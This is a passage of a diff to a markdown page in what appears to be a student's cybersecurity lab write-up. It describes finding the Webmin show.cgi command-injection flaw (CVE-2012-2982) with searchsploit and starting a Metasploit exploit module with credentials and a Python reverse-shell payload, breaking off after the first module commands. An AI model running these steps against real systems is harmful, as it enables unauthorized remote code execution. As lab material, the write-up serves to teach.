AriannaMucig/CybersecurityLab/home.md

 I cross-referenced this version against known public vulnerabilities using searchsploit: `searchsploit webmin`.
 The search identified a well-known Remote Code Execution vulnerability tracked as CVE-2012-2982.
 The flaw exists within the `show.cgi`component due to insufficient input validation, allowing an authenticated user to inject and execute arbitrary system commands with application privileges.

-To automate execution, I launched Metasploit (`msfconsole`), selected the appropriate exploit module, and configured the required session variables—including the remote target, credentials and a Python-based reverse shell payload to call back to my attacker machine:
+To automate execution, I launched Metasploit (`msfconsole`), selected the appropriate exploit module, and configured the required session variables, including the remote target, credentials and a Python-based reverse shell payload to call back to my attacker machine:
 ```bash
 use exploit/unix/webapp/webmin_show_cgi_exec
 set USERNAME aryastark